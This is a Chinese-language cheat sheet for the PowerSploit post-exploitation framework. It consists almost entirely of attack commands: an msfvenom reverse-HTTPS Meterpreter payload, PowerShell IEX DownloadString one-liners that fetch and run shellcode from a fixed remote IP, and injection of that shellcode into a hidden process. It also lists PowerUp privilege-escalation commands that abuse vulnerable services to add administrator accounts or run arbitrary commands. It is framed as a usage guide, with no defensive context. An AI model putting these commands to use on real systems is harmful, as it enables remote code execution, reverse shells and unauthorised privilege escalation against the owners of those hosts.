PowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为:github.com/PowerShellMafia/PowerSploit
git clone https://github.com/PowerShellMafia/PowerSploit
直接执行Shellcode,反弹Meterpreter Shell
windows/meterpreter/reverse_https
msfvenom –p windows/meterpreter/reverse_https LHOST=10.238.207.80 LPORT=4444 –f powershell –o /var/www/html/test
IEX(New-Object Net.WebClient).DownloadString(“http://10.238.207.80/PowerSploit/CodeExecution/Invoke-Shellcode.ps1”)
IEX(New-Object Net.WebClient).DownloadString(“http://10.238.207.80/test”)
Invoke-Shellcode –Shellcode($buf) –Force
指定进程注入Shellcode反弹Meterpreter
IEX(New-Object Net.WebClient).DownloadString(“10.238.207.80/PowerSploit/CodeExecution/Invoke-Shellcode.ps1”)
IEX(New-Object Net.WebClient).DownloadString(“http://10.238.207.80/test”)
Get-Process 或 ps
Start-Process C:\windows\system32\notepad.exe –WindowStyle Hidden
Invoke-Shellcode -ProcessID <进程ID> -Shellcode($buf) –Force
是Privesc模块下的脚本,拥有众多用来寻找目标主机windows服务漏洞进行提权的使用脚本
Import-Module .\PowerUp.ps1
命令:Invoke-AllChecks
命令:Find-PathDllHijack
命令:Get-ApplicationHost
Get-Application | Format-Table –Autosize #列表显示
命令:Get-RegistryAlwaysInstallElevated
命令:Get-RegistryAutoLogon
命令:Get-ServiceDetail –ServiceName DHCP #获取DHCP服务详细信息
命令:Get-ServiceFilePermission
命令:Test-ServiceDaclPermission
命令:Get-ServiceUnquoted
命令:Get-UnattendedInstallFile
命令:Get-ModifiableRegistryAutoRun
命令:Get-ModifiableScheduledTaskFile
命令:Get-Webconfig
命令:Invoke-ServiceAbuse -ServiceName VulnSVC #添加默认账号
Invoke-ServiceAbuse -ServiceName VulnSVC -UserName “..” #指定添加的域账号
Invoke-ServiceAbuse -ServiceName VulnSVC -UserName <> -Password <> -LocalGroup “Administrator” #添加指定用户,密码到指定组
Invoke-ServiceAbuse -ServiceName VulnSVC -Command “..” #自定义执行命令
命令:Restore-ServiceBinary -ServiceName VulnSVC
命令:Test-ServiceDaclPermission -ServiceName VulnSVC
命令:Write-UserAddMSL
命令:Write-ServiceBinary –ServiceName VulnSVC #添加默认账号
Write-ServiceBinary –ServiceName VulnSVC –UserName “..” #指定添加域账号
Write-ServiceBinary –ServiceName VulnSVC –UserName <> -Password <> #指定添加用户,密码到指定组
Write-ServiceBinary –ServiceName VulnSVC –Command “..” #自定义执行命令
区别是,前者生成可执行文件,后者直接安装服务